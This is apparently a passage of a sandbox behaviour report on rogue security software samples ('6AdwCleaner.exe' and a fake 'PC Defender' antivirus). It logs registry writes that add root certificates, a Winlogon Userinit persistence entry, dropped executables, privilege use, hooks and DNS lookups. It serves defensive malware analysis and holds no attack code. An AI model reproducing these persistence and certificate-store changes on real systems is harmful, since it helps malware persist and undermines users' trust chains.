Set value (data) \REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\8AD5C9987E6F190BD6F5416E2DE44CCD641D8CDA\Blob = 0300000001000000140000008ad5c9987e6f190bd6f5416e2de44ccd641d8cda140000000100000014000000daed6474149c143cabdd99a9bd5b284d8b3cc9d8040000000100000010000000ff5fbc4290fa389e798467ebd7ae940b0f0000000100000014000000c45627b5584bf62327df60d6185744a2d2f2bcbf190000000100000010000000e843ac3b52ec8c297fa948c9b1fb28195c00000001000000040000000008000018000000010000001000000045ed9bbc5e43d3b9ecd63c060db78e5c4b0000000100000044000000350034003500370041003800430045003400420032004100370034003900390046003800320039003900410030003100330042003600450031004300370043005f000000200000000100000088040000308204843082036ca0030201020210421af2940984191f520a4bc62426a74b300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3035303630373038303931305a170d3230303533303130343833385a308195310b3009060355040613025553310b3009060355040813025554311730150603550407130e53616c74204c616b652043697479311e301c060355040a131554686520555345525452555354204e6574776f726b3121301f060355040b1318687474703a2f2f7777772e7573657274727573742e636f6d311d301b0603550403131455544e2d5553455246697273742d4f626a65637430820122300d06092a864886f70d01010105000382010f003082010a0282010100ceaa813fa3a36178aa31005595119e270f1f1cdf3a9b826830c04a611df12f0efabe79f7a523ef55519684cddbe3b96e3e31d80a2067c7f4d9bf94eb47043e02ce2aa25d870409f6309d188a97b2aa1cfc41d2a136cbfb3d91bae7d97035fae4e790c39ba39bd33cf5129977b1b709e068e61cb8f39463886a6afe0b76c9bef422e467b9ab1a5e77c18507dd0d6cbfee06c7776a419ea70fd7fbee9417b7fc85bea4abc41c31ddd7b6d1e4f0efdf168fb25293d7a1d489a1072ebfe10112421e1ae1d89534db647928ffba2e11c2e5e85b9248fb470bc26cdaad328341f3a5e54170fd65906dfafa51c4f9bd962b19042cd36da7dcf07f6f8365e26aab8786750203010001a381f43081f1301f0603551d23041830168014adbd987a34b426f7fac42654ef03bde024cb541a301d0603551d0e04160414daed6474149c143cabdd99a9bd5b284d8b3cc9d8300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030440603551d1f043d303b3039a037a0358633687474703a2f2f63726c2e7573657274727573742e636f6d2f416464547275737445787465726e616c4341526f6f742e63726c303506082b0601050507010104293027302506082b060105050730018619687474703a2f2f6f6373702e7573657274727573742e636f6d300d06092a864886f70d010105050003820101004d422fa6c18aeb07809058468cf81939662a3c5a2c6dcfd4d987558d790b12887b408fd5c7f84b8d551663adb757dc3b2bbdd3c14f1e03874b449be3e2404526f326492b6a84f1547ad442dafcd36abb667eca9eeae9bbdc07c7c3924e833c81499f92d53209ea492ea111719a36d2c54e68b6cb0e1b2516af6cde5d76d81f72b193268617db18deaf45e9dffb98af1418eda45ef6899445f055044addff27dd064a40f6b4bcf1e40f9902bbfd5d0e2e28c1be3b5f1a3f971084bc163ed8a39c631d66cb5c5fda3ef30f0a093522dbdbc03f00f9e60d5d67d1fda01e032bd940f7becc87665480a6a3b8f51962d5d226b19826ee9acb44a7455a8195151af551 C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868 C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 0f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b00000001000000260000005300650063007400690067006f00200028004100640064005400720075007300740029000000620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff2140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a1d000000010000001000000006f9583c00a763c23fb9e065a3366d557e0000000100000008000000000063f58926d70168000000010000000800000000409120d035d90103000000010000001400000002faf3e291435468607857694df5e45b6885186820000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604 C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 19000000010000001000000045ed9bbc5e43d3b9ecd63c060db78e5c03000000010000001400000002faf3e291435468607857694df5e45b6885186868000000010000000800000000409120d035d9017e0000000100000008000000000063f58926d7011d000000010000001000000006f9583c00a763c23fb9e065a3366d55140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff20b00000001000000260000005300650063007400690067006f0020002800410064006400540072007500730074002900000053000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b20000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604 C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe

"C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.vikingwebscanner.com udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 www.vikingwebscanner.com udp
US 8.8.8.8:53 crl.usertrust.com udp
US 172.64.149.23:80 crl.usertrust.com tcp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 8.8.8.8:53 crl.comodoca.com udp
US 104.18.38.233:80 crl.comodoca.com tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 134.71.91.104.in-addr.arpa udp
US 8.8.8.8:53 81.171.91.138.in-addr.arpa udp
US 8.8.8.8:53 79.121.231.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 67.112.168.52.in-addr.arpa udp

Files

memory/3680-0-0x00000000008B0000-0x00000000008DE000-memory.dmp

memory/3680-1-0x00007FFD10A70000-0x00007FFD11531000-memory.dmp

memory/3680-2-0x000000001B670000-0x000000001B680000-memory.dmp

memory/3680-3-0x000000001B670000-0x000000001B680000-memory.dmp

memory/3680-4-0x000000001B670000-0x000000001B680000-memory.dmp

memory/3680-5-0x000000001BF70000-0x000000001C119000-memory.dmp

memory/3680-6-0x00007FFD10A70000-0x00007FFD11531000-memory.dmp

memory/3680-7-0x000000001B670000-0x000000001B680000-memory.dmp

memory/3680-29-0x000000001BF70000-0x000000001C119000-memory.dmp

memory/3680-30-0x000000001B670000-0x000000001B680000-memory.dmp

memory/3680-31-0x000000001B670000-0x000000001B680000-memory.dmp

memory/3680-32-0x000000001BF70000-0x000000001C119000-memory.dmp

memory/3680-33-0x000000001B670000-0x000000001B680000-memory.dmp

memory/3680-34-0x000000001BF70000-0x000000001C119000-memory.dmp

memory/3680-35-0x000000001BF70000-0x000000001C119000-memory.dmp

memory/3680-36-0x000000001BF70000-0x000000001C119000-memory.dmp

memory/3680-37-0x000000001BF70000-0x000000001C119000-memory.dmp

memory/3680-38-0x000000001BF70000-0x000000001C119000-memory.dmp

memory/3680-39-0x000000001BF70000-0x000000001C119000-memory.dmp

memory/3680-40-0x000000001BF70000-0x000000001C119000-memory.dmp

memory/3680-41-0x000000001BF70000-0x000000001C119000-memory.dmp

memory/3680-42-0x000000001BF70000-0x000000001C119000-memory.dmp

memory/3680-43-0x000000001BF70000-0x000000001C119000-memory.dmp

memory/3680-44-0x000000001BF70000-0x000000001C119000-memory.dmp

Analysis: behavioral32

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win10v2004-20240226-en

Max time kernel

152s

Max time network

159s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\PCDefender.exe"

Signatures

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,\"C:\\Program Files (x86)\\Def Group\\PC Defender\\Antispyware.exe\"" C:\Windows\syswow64\MsiExec.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Fake AV\PCDefender.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Def Group\PC Defender\hook.dll C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Installer\{FC2ABC8E-3715-4A32-B8B5-559380F45282}\_3F16219B047CF8432B7ADA.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{FC2ABC8E-3715-4A32-B8B5-559380F45282}\_3F16219B047CF8432B7ADA.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e5811dd.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI1335.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{FC2ABC8E-3715-4A32-B8B5-559380F45282}\_966CD4ED37489844400D0C.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e5811dd.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{FC2ABC8E-3715-4A32-B8B5-559380F45282} C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{FC2ABC8E-3715-4A32-B8B5-559380F45282}\_966CD4ED37489844400D0C.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e5811e1.msi C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000f85275ef8222787e0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000f85275ef0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900f85275ef000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1df85275ef000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000f85275ef00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script\Settings C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\24 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133538927103019166" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\22\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\23 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script\Settings\JITDebug = "0" C:\Windows\syswow64\MsiExec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\23 C:\Windows\system32\msiexec.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\Fake AV\PCDefender.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\PackageCode = "18627594958587344B2B3984171915B1" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\C73BCE36FA1AA0E45AB2649A3FA0D390 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528 C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\E8CBA2CF517323A48B5B5539084F2528\DefaultFeature C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\C73BCE36FA1AA0E45AB2649A3FA0D390\E8CBA2CF517323A48B5B5539084F2528 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\PackageName = "PCDefenderSilentSetup.msi" C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\Version = "16777216" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\E8CBA2CF517323A48B5B5539084F2528 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528 C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\C73BCE36FA1AA0E45AB2649A3FA0D390 C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\E8CBA2CF517323A48B5B5539084F2528 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\ProductName = "PC Defender" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\Media C:\Windows\system32\msiexec.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
